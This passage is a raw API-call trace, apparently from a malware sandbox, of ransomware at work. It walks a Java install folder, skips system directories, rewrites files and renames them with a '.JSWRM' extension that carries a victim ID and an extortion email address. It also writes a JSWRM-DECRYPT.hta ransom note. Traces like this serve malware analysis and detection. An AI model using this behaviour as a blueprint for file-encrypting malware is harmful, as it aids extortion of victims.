cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.bfc", lpUsedDefaultChar=0x0) returned 14 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0070.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0070.384] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.384] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3770) returned 1 [0070.384] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xeb0) returned 0x24d1d8 [0070.384] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0xeb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0xeb0, lpOverlapped=0x0) returned 1 [0070.386] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.386] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0xeb0, lpOverlapped=0x0) returned 1 [0070.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.386] CloseHandle (hObject=0x454) returned 1 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0070.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0070.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0070.387] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2948, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fontconfig.properties.src", cAlternateFileName="FONTCO~1.SRC")) returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2=".") returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="..") returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="...") returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="windows") returned -1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="recovery") returned -1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="perflogs") returned -1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="documents and settings") returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="$RECYCLE.BIN") returned 1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="system volume information") returned -1 [0070.387] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2="msocache") returned -1 [0070.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x2413d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.properties.src", lpUsedDefaultChar=0x0) returned 25 [0070.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.properties.src", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.properties.src", lpUsedDefaultChar=0x0) returned 25 [0070.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.388] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.388] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10568) returned 1 [0070.388] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2940) returned 0x24d1d8 [0070.388] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x2940, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x2940, lpOverlapped=0x0) returned 1 [0070.390] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.391] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x2940, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x2940, lpOverlapped=0x0) returned 1 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.391] CloseHandle (hObject=0x454) returned 1 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0070.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0070.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.392] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fonts", cAlternateFileName="")) returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2=".") returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="..") returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="...") returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="windows") returned -1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="recovery") returned -1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="perflogs") returned -1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="documents and settings") returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="$RECYCLE.BIN") returned 1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="system volume information") returned -1 [0070.392] lstrcmpiW (lpString1="fonts", lpString2="msocache") returned -1 [0070.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0070.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0070.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0070.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\jswrm-decrypt.hta")) returned 0xffffffff [0070.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0070.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0070.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0070.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0070.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0070.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0070.395] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.396] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.396] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0070.397] CloseHandle (hObject=0x454) returned 1 [0070.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0070.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0070.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0070.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0070.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0070.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\jswrm-decrypt.hta")) returned 0x20 [0070.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0070.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.398] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x209f4330, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0070.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.398] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x209f4330, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0070.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.398] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209f4330, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x209f4330, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x209f4330, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0070.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0070.399] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12588, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaBrightDemiBold.ttf", cAlternateFileName="LUCIDA~1.TTF")) returned 1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2=".") returned 1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="..") returned 1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="...") returned 1 